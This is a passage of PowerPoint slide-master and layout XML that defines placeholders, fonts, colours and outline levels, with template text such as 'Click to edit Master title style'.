              <a:buFont typeface="Symbol" pitchFamily="18" charset="2"/>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06978F56-09CE-4BBF-8C4B-4AD64CCAE1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75939665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0704EF-F728-41DA-BCAC-3051137F9F9B}"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71360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2EBE030-6E05-4CF5-AE3D-BBFFB22DE1D6}"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0670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3" name="PlaceHolder 3"/>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7DBBD3D-5858-439E-A9A1-D1EC1DDFD0C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9687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931AF25-0BFA-4C0A-B484-59A283FF022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795695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D1DD209-119E-424D-9728-BBC930F3CBF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593776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D519F24-CC92-4DB2-B944-390A29284A7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4571888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7EADE18-D336-48F7-B6A0-FBBF42428107}"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49151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053811F-47E1-4D16-96AC-E59A7A660987}"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7416119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EEB4CD-C12D-4EE5-9099-0E99E540A66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764032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07EDB6-0D63-4FA0-91F7-53405C59CD5C}"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20074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3434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3E7A05-232F-41D3-B8A6-0A0AEE9222CA}"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36707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black"/>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CF161-BAA3-4A01-90C5-48C614C7F6DB}"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90803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85800" y="457200"/>
            <a:ext cx="7772040" cy="459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8" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68580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19" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466848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85800" y="1752480"/>
            <a:ext cx="3792600" cy="43430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22"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23" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668480" y="402120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457200"/>
            <a:ext cx="7772040" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="36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8580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26" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668480" y="1752480"/>
            <a:ext cx="379260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
        <p:nvSpPr>
          <p:cNvPr id="27" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4021200"/>
            <a:ext cx="7772040" cy="2071440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7772400" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Line 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761760" y="3124080"/>
            <a:ext cx="7772400" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="808080"/>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685800" y="1197000"/>
            <a:ext cx="7772040" cy="1469520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="BC4B2C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6245280"/>
            <a:ext cx="2133360" cy="475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ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6245280"/>
            <a:ext cx="2895120" cy="47592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5" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6245280"/>
            <a:ext cx="2133360" cy="475920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{D174C185-C5BD-4C60-BE41-030064966214}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>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6"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004666"/>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4666"/>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4666"/>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600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>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4666"/>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4666"/>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4666"/>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685800" y="1600200"/>
            <a:ext cx="7772400" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>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685800" y="457200"/>
            <a:ext cx="7772040" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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685800" y="1752480"/>
            <a:ext cx="7772040" cy="434304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4666"/>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004666"/>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4666"/>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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>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Sixth Outline Level</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Seventh Outline LevelClick to edit Master text styles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Second level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Third level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6248520"/>
            <a:ext cx="1904760" cy="45684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124080" y="6248520"/>
            <a:ext cx="2895120" cy="45684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553080" y="6248520"/>
            <a:ext cx="1904760" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{AC41321B-6EA1-4B6B-962C-F8C2B65891D2}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>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Line 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7772400" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>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457200"/>
            <a:ext cx="7772040" cy="990360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="BC4B2C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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685800" y="1752480"/>
            <a:ext cx="3809520" cy="434304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4666"/>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004666"/>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4666"/>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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>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Sixth Outline Level</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Seventh Outline LevelClick to edit Master text styles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Second level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Third level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648320" y="1752480"/>
            <a:ext cx="3809520" cy="434304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04666"/>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004666"/>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4666"/>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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Sixth Outline Level</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Seventh Outline LevelClick to edit Master text styles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Second level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Third level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="800000"/>
              </a:buClr>
              <a:buFont typeface="Symbol"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="004666"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="004666"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6248520"/>
            <a:ext cx="1904760" cy="45684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86" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2895120" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="1904760" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{BFA0CD3C-8119-44C3-963A-84E72CEB4ED8}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:p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752600"/>
            <a:ext cx="77724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6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cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266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cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266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itchFamily="18" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EF1CB01F-E429-44A2-A406-C5CF709A06C7}" type="slidenum">
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26631" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7772400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30967595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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3000">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
          <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
          <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
          <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
          <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
          <a:cs typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:srgbClr val="BC4B2C"/>
          </a:solidFill>
